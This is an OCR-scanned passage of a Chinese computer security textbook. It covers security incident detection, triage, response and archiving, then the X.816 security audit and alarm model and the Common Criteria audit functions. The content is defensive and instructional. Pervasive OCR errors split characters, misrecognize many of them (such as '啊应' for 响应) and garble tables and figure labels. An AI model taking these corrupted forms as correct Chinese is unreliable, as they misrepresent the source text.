e 记录 安全 违规 事件 以 供 日 后 参考 。 

表 17-2 列 出 了 与 计算 机 安全 事件 响应 相关 的 关键 术语 。 
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表 17-2 安全 事件 术语 
工件 (Artifact) 


在 系统 中 发 现 的 可 能 用 于 探测 或 攻击 系统 和 网 络 ， 或 正在 用 于 挫败 安全 防御 措施 的 文件 或 对 象 。 工 件 可 以 包括 
(但 不 限于 ) 计算 机 病毒 、 木 马 程 序 、 蠕 虫 、 攻 击 脚 本 (exploit script) ATRE, 


计算 机 安全 事件 响应 团队 (CSIRT ) 


为 协助 应 对 在 一 定 服务 区 域内 发 生 的 计算 机 安全 相关 事件 而 设立 的 能 力 机 构 ， 也 被 称 为 计算 机 事件 啊 应 小 组 
(CIRT) 或 CIRC (计算 机 应 急 响 应 中 心 、 计 算 机 事件 响应 能 力 )。 


服务 区 域 (Constituency ) 

CSIRT 所 服务 的 用 户 、 网 站 、 网 络 和 组 织 的 群体 。 
事件 

指 违反 计算 机 安全 策略 、 可 接受 的 使 用 策略 或 者 标准 的 实践 活动 ,或 因 违 反 上 述 策略 而 导致 的 可 能 的 威胁 。 
分 类 (Triage) 

信息 的 接收 、 初 始 排序 和 优先 级 处 理 以 帮助 对 其 进行 进一步 适当 处 理 的 过 程 。 
漏洞 

一 项 技术 可 能 被 利用 导致 安全 事件 发 生 的 特性 。 例 如 ， 如 果 一 个 程序 无 意中人 允许 普通 用 户 在 特权 模式 下 执行 任 
意 的 操作 系统 命令 ， 这 个 “特性 ”可 能 是 其 一 个 漏洞 。 


17.4.1 事件 检测 


安全 事件 可 以 由 用 户 或 者 管理 人 员 进 行 检 测 ， 这 些 管理 人 员 负 责 报 告 系统 故障 或 者 异常 行 
为 。 应 当 鼓 励 员 工 对 此 类 事件 进行 报告 。 同 时 ， 员 工 也 应 该 报告 系统 内 任何 可 疑 的 缺陷 。 组 织 
对 员工 的 一 般 性 安全 培训 中 应 当 包含 诸如 在 此 类 情况 下 应 当 与 谁 联系 这 样 的 细 记 。 

安全 事件 也 可 以 由 自动 化 工具 进行 检测 ， 这 些 工具 通常 用 于 分 析 从 系统 和 连接 的 网 络 中 所 
收集 的 数据 。 这 类 分 析 工 具 已 在 第 8 章 中 进行 了 介绍 。 这 些 工 具 会 对 那些 在 将 来 可 能 出 现 事 件 
的 征兆 或 者 正在 发 生 的 事件 的 迹象 进行 报告 。 可 以 对 安全 事件 进行 检测 的 工具 包括 : 

o 系统 完整 性 验证 工具 : 扫描 关键 的 系统 文件 、 目 录 和 服务 ， 以 确保 它们 没有 发 生 未 被 

适当 授权 的 改变 。 

e 日 志 分 析 工 具 : 利用 模式 识别 技术 分 析 记 录 在 审计 日 志 中 的 信息 ， 以 检测 潜在 的 安全 

事件 。 

。 网 络 和 主机 入 侵 检 测 系统 (IDS): 监视 和 分 析 网 络 和 主机 的 活动 ,通常 是 通过 对 此 类 

信息 与 网 络 攻击 特征 进行 比较 ， 以 检测 是 否 存在 潜在 的 安全 事件 。 

。 入 侵 防御 系统 : 在 人 侵 检测 系统 的 功能 基础 上 ， 增 加 使 之 能 够 阻 断 已 检测 到 的 攻击 活 

动 的 功能 。 这 类 系统 需 谨 慎 使 用 ， 因 为 如 果 它 们 对 那些 误 认为 是 攻击 的 行为 做 出 啊 应 ， 
或 是 无 根据 地 降低 系统 功能 ， 会 导致 系统 出 现 问题 。 在 第 9 章 我 们 对 此 类 系统 进行 了 
分 析 讨论 。 

此 类 自动 化 工具 的 效果 在 很 大 程度 上 取决 于 对 其 配置 的 准确 性 ， 以 及 所 使 用 的 模式 和 特征 


的 正确 性 。 该 类 工具 需 定期 更 新 ， 以 应 对 新 的 漏洞 或 攻击 。 此 外 ， 还 需 充 分 区 分 正常 、 合 法 的 
行为 与 异常 的 攻击 行为 。 这 并 不 是 总 能 容易 实现 的 ， 而 且 还 依赖 于 具体 组 织 以 及 它们 的 系统 的 
工作 模式 。 然 而 ， 自 动 化 工具 的 一 个 显著 优势 在 于 ， 通 过 定期 更 新 使 它们 可 以 跟踪 那些 已 知 的 
攻击 或 漏洞 的 变化 。 对 于 安全 管理 员 而 言 ， 他 们 对 系统 漏洞 做 出 打 补 丁 啊 应 或 是 根据 需要 及 时 
进行 调整 ， 都 很 难 跟 上 系统 安全 风险 快速 发 展 变化 的 步伐 。 使 用 目 动 化 工具 可 以 帮助 组 织 减 少 
此 类 啊 应 延迟 所 导致 的 风险 。 


在 组 织 中 部 署 此 类 工具 的 决定 取决 于 企业 的 安全 目标 、 目 的 以 及 在 风险 评估 中 所 发 现 的 某 
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种 特定 要 求 。 部 署 此 类 工具 通常 涉及 大 量 的 资源 ， 既 包括 人 力也 包括 财力 。 这 就 需要 在 降低 的 
风险 和 所 得 的 收益 间 进 行 权衡 。 

无 论 是 否 使 用 目 动 化 工具 ， 安 全 管理 员 都 需要 监控 与 漏洞 相关 的 报告 ， 并 在 必要 时 对 系统 
所 发 生 的 变化 做 出 啊 应 。 


17.4.2 分 类 功能 


此 功能 的 目标 是 ,确保 与 事件 处 理 服 务 直 接 相 关 的 信息 通过 单一 联络 点 ， 而 无 须 关 注 其 到 
达 方式 〈 例 如 ， 通 过 电子 邮件 、 热 线 电 话 、 帮 助 台 或 者 IDS)， 以 便 在 服务 中 进行 适当 的 再 分 配 
和 人 处理 。 这 个 目标 通常 是 通过 将 该 分 类 功能 作为 整个 事件 处 理 服 务 中 的 单一 联络 点 而 实现 的 。 
这 种 分 类 功能 通过 以 下 一 种 或 多 种 途径 对 传人 的 信息 做 出 响应 : 

1. 分 类 功能 可 能 需要 获取 更 多 的 信息 ， 以 对 事件 进行 分 类 。 

2. 如 果 事 件 涉及 一 个 已 知 的 漏洞 ， 分 类 功能 会 将 相关 漏洞 告知 企业 或 团体 的 各 个 部 门 ， 并 
彼此 分 享有 关 如 何 解决 漏洞 问题 或 减轻 漏洞 威胁 的 信息 。 

3. 分 类 功能 将 事件 标识 为 新 的 事件 或 正在 进行 的 事件 的 一 部 分 ， 并 按照 一 定 的 优先 级 将 此 
信息 交 给 事件 处 理 啊 应 功能 。 


17.4.3 事件 响应 


一 旦 某 个 潜在 的 事件 被 检测 到 ， 必 须 启 动 一 个 记录 程序 对 其 做 出 响应 。[CARN03] 列举 出 
了 以 下 可 能 的 啊 应 活动 : 
© 采取 行动 保护 受信 侵 者 的 活动 影响 或 威胁 的 系统 和 网 络 。 
© 为 与 之 相关 的 报告 和 警示 提供 解决 方案 或 减缓 措施 。 
e 在 网 络 的 其 他 部 分 中 寻找 入 侵 活动 。 
e 过 滤 网 络 流量 。 
e 重建 系统 。 
e 修补 或 修复 系统 。 
e 开发 其 他 响应 或 变通 策略 。 
响应 程序 必须 详细 说 明 如 何 识别 安全 事件 的 起 因 ， 无 论 是 意外 事件 还 是 蓄意 事件 。 随 后 ， 
该 程序 必须 描述 出 能 够 减少 组 织 的 损害 或 损失 的 活动 。 显 然 ， 描 绘 出 每 一 类 事件 的 细节 之 处 是 
不 太 可 能 的 ， 但 是 此 程序 应 能 够 识别 此 类 事件 的 类 型 ， 以 及 对 其 做 出 响应 所 需 采 取 的 步骤 。 理 
想 情况 下 ， 应 当 包 括 有 关 可 能 出 现 的 事件 和 通常 的 响应 方式 的 描述 。 此 外 ， 还 需要 确定 负责 制 
定 那些 对 企业 的 系统 有 重大 影响 的 决策 的 管理 人 员 ， 以 及 在 事件 发 生 时 应 如 何 随时 与 他 们 取得 
联系 。 在 某 些 情况 下 ， 例 如 有 大 量 被 蠕虫 感染 的 电子 邮件 ， 响 应 会 涉及 在 功能 的 重大 损失 和 未 
来 整个 系统 的 损害 之 间 的 权衡 ， 这 就 显得 格外 重要 。 毫 无 疑问 的 是 ， 这 样 的 决定 将 会 影响 到 企 
业 的 运作 ， 因 此 必须 迅速 做 出 决定 。NIST SP 800-61 列举 出 了 事件 响应 策略 中 涉及 的 几 类 安全 
事件 : 
e 阻止 或 妨碍 正常 使 用 系统 的 拒绝 服务 攻击 。 
e 感染 主机 的 恶意 代码 。 
e 在 未 经 授权 的 情况 下 访问 系统 。 
e 违反 系统 使 用 策略 的 不 正当 使 用 。 
© 多 成 分 事件 ， 包 括 两 个 或 两 个 以 上 的 上 述 单一 事件 。 
在 确定 对 事件 的 恰当 响应 时 ， 有 一 系列 问题 应 当 考 虑 ， 包 括 该 系统 对 于 企业 功能 的 重要 程 
， 以 及 就 系统 已 受 威胁 的 程度 而 言 ， 现 有 的 或 潜在 的 技术 对 事件 有 何 影响 。 
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具体 的 响应 过 程 还 应 当 包 括 在 某 种 情况 下 ， 需 要 将 安全 隐患 报告 给 第 三 方 ， 如 警方 或 与 此 
相关 的 CERT 组 织 (计算 机 应 急 响 应 团队 )。 不 同 的 企业 对 于 该 报告 的 态度 有 很 大 的 差别 。 清 
晰 的 报告 有 助 于 第 三 方 监测 计算 机 犯罪 的 整体 水 平和 发 展 趋势 ， 特 别 是 当 涉 及 法 律 诉讼 时 ， 此 
报告 也 利于 企业 收集 和 呈 弟 适当 的 证 据 。 尽 管 在 某 些 情况 下 依法 需要 进行 报告 ,但 还 是 有 许多 
其 他 类 型 安全 事件 的 响应 未 被 适当 规定 。 因 此 ， 当 这 些 报告 被 认为 是 适合 于 该 组 织 时 ， 需 要 提 
前 确定 这 些 问 题 。 还 有 一 种 机 会 ， 即 如 果 一 个 事件 在 外 部 被 报告 ， 那 么 它 将 可 能 会 被 公共 媒体 
报道 。 一 个 组 织 需 要 确定 一 般 如 何 对 此 类 报告 做 出 响应 。 

例如 ， 出 于 起 诉 罪魁 祸首 和 弥补 所 造成 的 损失 的 目的 ， 一 个 组 织 可 以 决定 将 计算 机 辅助 诈 
骗 的 事件 报告 给 警方 以 及 相关 的 CERT。 现 在 ， 法 律 规定 侵犯 个 人 信息 必须 上 报 有 关 部 门 ， 并 
做 出 适当 的 响应 。 然 而 ， 一 个 诸如 Web 站 点 涂改 的 事件 是 不 太 可 能 诉讼 成 功 的 。 因 此 ， 利 于 
组 织 的 策略 是 将 这 些 情况 报告 给 CERT， 并 采取 措施 进行 响应 ， 同 时 ， 尽 可 能 快速 地 恢复 功能 
并 将 此 类 攻击 再 次 发 生 的 可 能 性 降 到 最 低 。 

另 一 种 事件 响应 是 从 事件 中 收集 有 关 证 据 。 起 初 ， 这 些 信 息 用 于 从 事件 中 恢复 。 如 果 事 件 
被 报告 给 警方 ， 那 么 这 些 证 据 还 可 能 在 法 律 诉讼 程 ”热线 /服务 台 = 
序 中 发 挥 作用 。 在 此 类 情况 下 ， 仔 细 记 录 收集 证 据 A 
的 过 程 以 及 其 后 对 这 些 证 据 的 存储 和 传输 都 是 十 分 Rae ol pp a 
重要 的 。 如 果 在 这 些 过 程 中 不 符合 有 关 法 律 程序 ， a 
那么 这 些 证 据 可 能 不 会 被 法 院 采 纳 。 对 于 程序 的 具 th 
体 要 求 因 不 同 国家 而 不 同 。NIST SP 800-61 中 包含 
了 有 关 该 问题 的 一 些 指导 意见 。 

图 17-2 给 出 了 一 个 典型 的 事件 处 理 的 生命 周 
期 。 一 旦 某 个 事件 出 现 ， 它 就 在 各 个 状态 之 间 转 
移 ， 并 伴 有 与 事件 有 关 的 所 有 信息 (变化 的 状态 和 
相关 的 活动 )， 直 到 从 相应 团队 的 角度 考虑 不 再 需 
要 进一步 的 行动 ， 事 件 才 会 结束 。 图 17-2( 左 下 方 ) 


中 循环 的 部 分 说 明 这 些 状 态 在 一 个 活动 的 生命 周期 
可 能 会 多 次 循环 。 图 17-2 事件 处 理 的 生命 周期 


漏洞 报告 





17.4.4 事件 归档 


安全 事件 即时 响应 之 后 ， 有 必要 确定 哪些 漏洞 会 导致 此 安全 事件 的 发 生 ， 以 及 怎么 解决 以 
防止 此 类 事件 再 次 发 生 。 事 件 的 详情 和 采取 的 措施 被 记录 下 来 以 备 将 来 参考 ， 对 组 织 系统 的 影 
啊 和 风险 状况 也 必须 作为 这 一 事件 的 结果 。 

事件 归档 通常 包括 将 收集 的 信息 作为 事件 的 结果 ， 反 馈 给 信息 技术 安全 管理 进程 的 较 
为 早期 的 阶段 。 这 个 事件 有 可 能 极 少 发 生 而 组 织 只 是 不 幸 遇 上 了 。 更 一 般 的 情况 是 ， 一 个 
安全 事件 反映 了 组 织 需要 处 理 的 其 所 面临 的 风险 状况 ， 包 括 审查 有 关系 统 的 风险 评估 ， 以 及 
这 一 分 析 的 改变 或 者 扩展 情况 。 这 包括 审查 针对 一 些 风 险 的 控制 措施 、 强 化 现 有 的 控制 措施 
和 实施 新 的 控制 措施 。 这 个 过 程 也 反映 了 IT 安全 管理 (我 们 在 第 14 章 进 行 了 讨论 ) 的 循环 
特征 。 


17.4.5 事件 处 理 的 信息 流 
许多 服务 是 事件 处 理 功能 的 一 部 分 或 者 是 和 事件 处 理 功 能 进行 交互 的 。 表 17-3， 基 于 
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[CARN03]， 是 事件 处 理 服 务 信 息 流 去 向 和 来 源 的 例子 。 这 一 故障 类 型 对 于 组 织 和 优化 事件 处 
理 服 务 非常 有 用 ， 对 满足 事件 处 理 与 响应 要 求 的 人 员 培 训 也 非常 有 益 。 


表 17-3 事件 处 理 服务 信息 流 的 去 向 和 来 源 








服务 名 称 事件 处 理 信息 流 来 源 

eink 关于 如 何 识别 特定 恶意 软件 的 使 用 的 信息 | 。 事故 中 识别 恶意 代码 情况 的 统计 
恶意 软件 影响 和 危害 信息 新 的 恶意 代码 样本 

ge 实际 的 例子 和 动机 

入侵 检测 服务 检查 新 的 攻击 特征 

安全 审计 或 评估 常见 攻击 场景 

安全 咨询 关于 常见 陷阱 和 危险 严重 性 的 信息 实际 的 例子 /经 历 

风险 分 析 关于 常见 陷阱 和 危险 严重 性 的 信息 统计 或 场景 的 损失 情况 

menn 未 来 可 能 攻击 场景 的 警告 统计 数据 或 状态 报告 
新 工具 的 发 布 警告 要 考虑 和 研究 的 新 的 攻击 形式 


17.5 关键 术语 、 复 习题 和 习题 


关键 术语 
computer security incident (计算 机 安全 事件 ) 


computer security incident response team (计算 机 安 


incident handling (事件 处 理 ) 

incident response (事件 响应 ) 

security awareness (安全 意识 ) 

security basics and literacy (安全 基础 知识 和 素养 ) 


全 事件 响应 团队 ) 
e-mail and Internet use policy (电子 邮件 和 Internet RD education apr tal 
使 用 策略 ) security training (安全 培训 ) 
复习 题 


17.1 机 构 的 安全 意识 、 培 训 和 教育 项 目 有 什么 好 处 ? 

17.2 ”安全 意识 和 安全 培训 之 间 的 区 别 是 什么 ? 

17.3 ”安全 意识 项 目的 目标 是 什么 ? 

17.4 简要 陈述 对 员工 的 招聘 过 程 、 雇 用 期 间 和 离职 过 程 的 安全 目标 是 什么 。 
17.5 什么 是 ISO 27002 ? 

17.6 为 什么 电子 邮件 和 Internet 使 用 策略 是 必需 的 ? 

17.7 列举 一 些 应 当 通 过 电子 邮件 和 Internet 使 用 策略 进行 处 理 的 事件 。 

17.8 ”开发 事件 响应 能 力 有 什么 好 处? 

17.9 列 出 安全 事件 大 致 的 种 类 。 

17.10 列 出 一 些 事件 监测 和 事件 响应 工具 的 类 型 。 

17.11 在 整个 信息 技术 安全 管理 过 程 中 ， 处 理 安全 事件 之 后 会 出 现 什么 现象 ? 
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习题 


17.1 在 17.1 节 中 包含 了 一 个 来 自 NIST SP 800-100 的 引用 ， 该 引用 证 明了 安全 意识 解决 的 是 安全 是 什么 
而 不 是 怎样 才能 安全 的 问题 ， 试 分 析 这 两 者 之 间 的 区 别 。 

17.2 a. 警卫 Joe 在 打扫 CEO 的 办 公 室 后 ， 用 自己 的 手机 对 办 公 室 拍照 ， 这 个 动作 被 公司 的 安全 照相 机 

记录 下 来 。 但 胶片 不 太 清晰 (因为 反复 使 用 或 者 再 次 使 用 )， 你 不 能 确定 他 具体 拍摄 的 是 什么 . 
你 能 看 到 他 手机 上 照相 机 的 闪光 灯亮 过 ， 而 且 闪 光 灯 恰 在 CEO 的 桌 前 闪光 。 你 应 该 怎么 办 ? 你 
行动 的 依据 是 什么 ? 

b. 为 了 在 今后 预防 或 者 至 少 减少 任何 可 能 的 法 律 纠纷 ， 如 警卫 Joe 被 法 庭 起 诉 ， 你 应 该 怎么 办 ? 

17.3 ”你 收 到 一 份 似乎 来 自 公 司 人 事 部 门 的 电子 邮件 ， 并 紧急 请 求 你 打开 并 填写 所 附 文件 ， 以 免 失 去 可 
能 的 加 薪 。 但 仔细 观察 你 会 注意 到 消息 语法 很 瘤 众 ， 并 且 附 件 以 .doc.zip 结尾 。 你 应 该 怎么 办 ? 

17.4 ”同事 Lynsay 最 近 离 开 了 人 公司。 但是， 在 一 个 星期 五 下 午 晚 些 时 候 ， 你 在 办 公 室 发 现 Lynsay 登录 公 
司 电脑 。Lynsay 离职 可 能 没有 达到 哪些 安全 目标 ? 

17.5 你 发 现 同事 Harriet 坐 在 她 的 工作 台 前 看 起 来 很 苦恼 。 并 且 当 你 委婉 地 询问 可 能 发 生 了 什么 问题 时 ， 
她 解释 说 她 收 到 了 另 一 位 同事 Greg 的 电子 邮件 ， 辱 骂 她 并 批评 她 的 工作 。 管理 部 门 根据 什么 理由 
确认 Greg 的 这 些 信 息 ， 并 指示 他 今后 采取 更 适当 的 行动 。 

17.6 Phil 在 网 上 维护 着 一 个 博客 ， 在 检查 他 的 博客 有 没有 泄露 公司 的 重要 信息 时 ， 你 需要 做 什么 ?他 
是 否 被 允许 在 工作 时 间 维 护 博客 ?他 争辩 说 他 的 博客 是 在 非 工 作 时 间 维 护 的 ， 你 应 该 怎么 回应 ? 
你 发 现 他 的 博客 有 一 个 到 YourCompanySucks 网 站 的 链接 ， 而 Phil 声称 他 不 是 这 个 站 点 的 所 有 者 ， 
你 应 该 怎么 办 ? 

17.7 考虑 为 习题 14.2 和 习题 15.1 提 到 的 小 型 会 计 事务 所 开发 事件 响应 策略 。 更 具体 地 说 ， 是 对 于 感 
染 公司 的 系统 和 造成 电子 邮件 大 量 传播 蔓延 的 电子 邮件 蠕虫 感染 进行 检测 之 后 的 响应 。 如 果 公 司 
的 事件 响应 策略 决定 断 开 公司 的 网 络 连 接 以 限制 昨 虫 的 继续 传播 ， 你 应 建议 其 采取 什么 默认 的 措 
施 ? 从 通信 在 公司 正常 运营 中 的 重要 作用 出 发 ， 对 于 这 一 事件 你 建议 相关 计算 机 应 急 响 应 团队 
(Computer Emergency Response Team, CERT) 采取 什么 默认 措施 ”或 对 相关 执法 机 关 如 何 建议 ? 

17.8 考虑 为 习题 14.3 和 习题 15.2 提 到 的 小 型 法 律 公 司 开 发 事件 响应 策略 。 更 具体 地 说 ， 是 对 于 员工 的 
财务 欺诈 行为 进行 检测 之 后 的 响应 。 事 件 啊 应 策略 最 初 应 采取 什么 措施 ”对 于 这 一 事件 你 建议 相 
关 CERT 采取 什么 默认 措施 ”或 对 相关 的 执法 机 关 如 何 建议 ? 

17.9 考虑 为 习题 14.4 和 习题 15.3 提 到 的 网 站 设计 公司 开发 事件 响应 策略 。 更 具体 地 说 ， 是 对 于 入 侵 和 
损坏 公司 Web 服务 器 进行 检测 之 后 的 啊 应 。 如 果 公 司 的 事件 响应 策略 决定 断 开 公司 的 网 络 连接 以 
控制 损失 的 扩大 ， 你 应 建议 其 采取 什么 默认 的 措施 ? 考虑 公司 正常 运营 不 能 离开 服务 器 ， 对 于 这 
一 事件 你 建议 相关 CERT 采取 什么 默认 措施 ?或 对 相关 的 执法 机 关 如 何 建议 ? 

17.10 考虑 为 习题 14.6 和 习题 15.5 提 到 的 大 型 政府 部 门 开发 事件 啊 应 策略 。 特 别 考虑 这 样 的 场景 : 某 
部 门 员工 统一 配 发 的 笔记 本 电脑 被 客 ， 并 发 现 其 中 存 有 大 量 敏感 的 人 事 记 录 。 对 于 这 一 事件 进行 
响应 。 如 果 公 司 的 事件 响应 策略 是 决定 与 信息 被 窃取 的 员工 进行 谈话 ， 你 应 建议 其 采取 什么 默认 
的 措施 ?” 如 果 公 司 的 事件 响应 策略 是 决定 处 罚 丢 失 笔 记 本 电脑 的 员工 ， 你 应 建议 其 采取 什么 默 
认 的 措施 ?从 任何 可 能 适用 的 相关 法 律 要 求 出 发 ， 以 及 依据 部 门 IT 策略 应 采取 的 措施 的 必要 性 ， 
你 建议 相关 CERT 采取 什么 默认 措施 ?或 对 相关 的 执法 机 关 如 何 建议 ? 
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学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

© 讨论 安全 审计 体系 结构 的 组 成 要 素 ; 
评估 不 同类 型 的 安全 审计 迹 的 相对 优势 ; 


ə 
© 理解 实现 安全 审计 日 志 功 能 过 程 中 的 要 点 ; 
e 描述 审计 迹 分 析 的 过 程 。 





安全 审计 是 着 眼 于 机 构 的 信息 技术 (IT) 资产 安全 的 一 种 审计 形式 。 该 功能 是 计算 机 安全 
中 的 关键 部 分 。 安 全 审计 能 够 : 
为 与 安全 相关 的 正当 的 计算 机 操作 提供 一 定 级 别 的 保证 。 
© 无 论 攻击 是 否 成 功 ， 都 为 其 生成 可 用 于 事后 (after-the-fact) 分 析 的 数据 。 
e 提供 一 种 可 用 于 评估 安全 服务 中 存在 的 不 足 的 方法 。 
° 


提供 能 够 用 于 定义 异常 行为 的 数据 。 
维护 对 计算 机 取证 有 用 的 记录 。 
两 个 重要 的 概念 是 审计 和 审计 迹 9， 其 定义 如 表 18-1 所 述 。 
表 18-1 安全 审计 术语 (RFC 4949 ) 
安全 审计 (Security Audit) 对 系统 记录 和 活动 进行 独立 的 审查 和 检查 以 确定 系统 控制 的 充分 性 ， 确 保 其 符合 已 建 
立 的 安全 策略 和 操作 规程 ， 检 测 安 全 服务 的 违规 行为 ， 并 对 措施 的 改变 提出 建议 。 
基本 的 审计 目标 是 为 发 起 或 参与 安全 相关 (security-relevant) 事件 和 活动 的 系统 实体 建立 责任 制 。 因 此 ， 需 要 由 工 
具 来 生成 和 记录 安全 审计 迹 ， 并 通过 查看 和 分 析 审计 迹 来 发 现 和 调查 所 受 的 攻击 和 安全 损害 。 


安全 审计 迹 (Security Audit Trail) 按时 间 顺 序 排列 的 系统 活动 记录 ， 这 些 记录 足以 对 环境 与 周围 活动 序列 进行 重 
建 与 检查 ， 或 是 对 从 开始 到 最 终结 果 过 程 中 的 一 个 操作 、 步 骤 或 一 个 安全 相关 事务 中 的 事件 进行 定位 。 


我 们 在 第 8 章 讨论 过 ， 在 审计 信息 的 生成 过 程 中 会 产生 可 能 对 实时 人 侵 检测 有 用 的 数据 。 
在 本 章 中， 我 们 关注 的 问题 是 与 IT 安全 相关 的 数据 的 收集 、 存 储 和 分 析 。 首 先 介绍 安全 审计 
体系 结构 的 整体 概况 及 其 与 人 侵 检 测 相关 活动 的 关系 。 接 下 来 ， 讨 论 审计 迹 (也 称 为 审计 日 志 ) 
的 各 个 方面 的 内 容 。 最 后 ， 讨 论 审计 数据 的 分 析 。 


18.1 安全 审计 体系 结构 


这 一 节 我 们 从 分 析 构 成 安全 审计 体系 结构 的 组 件 开始 来 讨论 安全 审计 。 首 先 ， 我们 研究 一 
种 更 广泛 意义 下 的 安全 审计 模型 。 然 后 我 们 再 着 眼 于 安全 审计 各 个 功能 的 详细 分 类 。 


© NIST SP 800-12 (计算 机 安全 入 门 : NIST 手册 ，1995 年 10 月 ) 指出 ,一些 安全 专家 对 审计 迹 和 审计 日 志 进 
行 了 如 下 的 区 分 : 日 志 是 由 一 个 特定 的 软件 程序 包 生 成 的 事件 的 记录 ， 而 审计 迹 是 一 个 事件 的 整个 历史 ， 可 
能 使 用 多 个 日 志 进 行 记 录 。 但 是 ， 安 全 共同 体 (security community) 通常 不 使 用 此 定义 。 我 们 在 本 书 中 也 不 
作 区 分 。 


388 PERD 管理 问题 


18.1.1 安全 审计 和 报警 模型 


ITU-T9 推 荐 标准 X.816 提出 了 一 种 模型 ， 该 模型 给 出 了 安全 审计 功能 的 组 件 ， 以 及 这 些 
组 件 与 安全 报警 之 间 的 关系 。 图 18-1 4 
述 了 该 模型 。 其 中 的 关键 组 件 如 下 : 

e 事件 鉴别 器 (event discriminator): 审计 

事件 鉴别 硕 按 照 一 定 逻 辑 仍 人 到 系 
统 的 软件 中 ， 它 监控 系统 活动 并 检 
测 为 了 检测 而 配置 的 安全 相关 事件 。 

o 审计 记录 器 (audit recorder): 对 每 

个 检测 到 的 事件 ， 事件 鉴别 副将 
信息 传输 到 审计 记录 堪 。 该 模型 
以 消息 的 形式 描述 此 传输 。 通 过 记 
录 共 享 内 存 区 域 中 的 事件 ， 其 也 可 
用 于 审计 。 

o 报警 处 理 器 (alarm processor): 事 
件 鉴别 天 检测 到 的 某 些 事件 被 定义 
为 报警 事件 。 对 这 样 的 事件 ， 报 警 图 18-1 安全 审计 和 报警 模型 (X.816 ) 

会 通知 给 报警 处 理 器 。 报 警 处 理 器 

基于 该 报警 采取 一 些 动 作 。 该 动作 自身 是 可 审计 事件 ， 并 因此 被 传输 到 审计 记录 需 。 
安全 审计 人 迹 (security audit trail): 审计 记录 条 为 每 个 事件 创建 格式 化 的 记录 并 将 其 存储 
在 安全 审计 迹 中 。 

e 审计 分 析 器 ( audit analyzer): 安全 审计 迹 对 审计 分 析 顺 来 说 是 十 分 有 用 的 ， 审 计 分 析 硕 

基于 活动 模式 ， 可 以 定义 新 的 可 审计 事件 并 将 其 发 送 到 审计 记录 需 ， 还 可 能 会 生成 报警 。 

e 审计 存档 器 (audit archiver): 这 是 一 个 软件 模块 ， 它 定期 从 审计 迹 中 提取 记录 创建 可 审 

计 事 件 的 一 个 永久 的 存档 。 

e 存档 (archive) 审计 存档 是 在 此 系统 上 与 安全 相关 的 事件 的 永久 存储 。 

e 审计 提供 器 (audit provider): 审计 提供 需 是 一 个 应 用 程序 或 审计 迹 的 用 户 接口 。 

e 审计 迹 检查 器 (audit trail examiner): 审计 迹 检查 器 是 一 个 应 用 程序 或 用 户 ， 出 于 计算 

机 取证 和 其 他 分 析 的 目的 ， 检查 审 计 迹 和 审计 存档 的 历史 趋势 。 

e 安全 报告 (security report): 审计 迹 检查 需 准 备 的 人 工 可 读 的 (human-readable) 安全 报告 。 

该 模型 说 明了 审计 功能 和 报警 功能 之 间 的 关系 。 审 计 功 能 建立 了 安全 管理 员 定 义 的 与 安全 
相关 的 事件 记录 。 这 些 事件 中 的 某 些 事件 可 能 实际 上 违反 了 安全 的 规定 ， 或 者 被 怀疑 违反 了 安 
全 的 规定 。 这 样 的 事件 通过 报警 方式 输入 到 入 侵 检测 系统 或 防火 墙 系统 。 

与 人 侵 检 测 技术 一 样 ， 分 布 式 的 审计 功能 建立 一 个 中 央 存 储 库 ， 这 对 分 布 式 系统 是 非常 有 
用 的 。 分 布 式 审计 服务 需要 两 个 额外 的 逻辑 组 件 (如 图 18-2 所 示 )。 

o 审计 人 迹 收 集 颖 ( audit trail collector): 中 央 系 统 的 一 个 模块 ， 用 于 从 其 他 系统 收集 审计 

迹 记 录 ， 并 生成 一 个 组 合 的 审计 迹 。 

e 审计 调度 器 (audit dispatcher): 用 于 从 本 地 系统 到 中 央 审 计 迹 收集 硕 传 输 审计 迹 记 录 的 

模块 。 





O 国际 电信 联盟 的 电信 标准 化 部 门 (Telecommunication Standardization Sector of the International Telecom- 
munications Union，ITU-T)。 请 参阅 附录 C 中 有 关 该 组 织 和 其 他 标准 制定 组 织 的 讨论 。 
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审计 调度 器 


审计 迹 收集 器 


审计 调度 器 





图 18-2 分布 式 审计 迹 模 型 (X.816 ) 


18.1.2 ”安全 审计 功能 


安全 审计 功能 的 另外 一 种 详细 分 类 也 是 非常 有 用 的 ， 这 种 分 类 已 经 发 展 成 为 通用 标准 规 泄 
(Common Criteria specification) [CCPS12a] 的 一 部 分 。 图 18-3 显示 了 安全 审计 被 分 解 成 6 个 主 
要 方面 ， 每 个 方面 包含 一 个 或 多 个 特定 的 功能 。 这 六 个 方面 包括 : 


ony 





图 18-3 ”安全 审计 类 分 解 的 通用 标准 
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e 数据 生成 (data generation): 标识 审计 级 别 ， 枚 举 可 审计 事件 的 类 型 ， 并 标识 所 提供 的 
与 审计 相关 的 信息 的 最 小 集 。 该 功能 还 必须 处 理 安全 和 隐私 之 间 的 冲突 ， 并 为 那些 事 
件 指定 ， 与 动作 相关 的 用 户 的 身份 应 该 包含 在 为 事件 生成 的 数据 中 。 

e 事件 选择 (event selection): 在 可 审计 集中 ， 选 定 或 排除 一 些 事件 。 这 样 可 以 使 系统 配 

- 置 不 同 级 别 的 粒度 ， 以 避免 产生 难以 使 用 的 审计 迹 。 

e 事件 存储 (event storage): 创建 和 维护 安全 审计 迹 。 存 储 功 能 包括 提供 可 用 性 并 防止 审 
计 迹 的 数据 丢失 的 技术 措施 。 

e 自动 响应 〈automatic response): 定义 在 检测 到 可 能 违反 安全 规定 的 事件 后 所 采取 的 
反应 。 

e 审计 分 析 (audit analysis): 在 搜索 安全 违规 中 ， 提 供 自 动 化 的 机 制 来 分 析 系 统 活动 和 审 
计数 据 。 该 组 件 标识 可 审计 事件 集 ， 这 些 事件 的 发 生 或 累积 发 生 表明 有 潜在 的 安全 违 
规 。 对 于 这 样 的 事件 进行 分 析 是 为 了 确定 是 否 已 发 生 安全 违规 ; 这 种 分 析 使 用 异常 检 
测 和 启发 式 攻 击 (attack heuristic) 方法 。 

e 审计 复核 (audit review): 对 于 已 经 被 授权 的 用 户 ， 可 用 于 帮助 对 审计 数据 的 审核 。 审 
计 复 核 组 件 可 能 包含 一 个 可 选 的 复核 功能 ， 能 够 根据 单个 标准 或 多 个 具有 逻辑 关系 的 
标准 执行 搜索 ， 对 审计 数据 进行 排序 ， 以 及 在 复核 之 前 对 审计 数据 进行 第 选 。 审 计 复 
核 仅 限 于 授权 的 用 户 。 


18.13 ”需求 


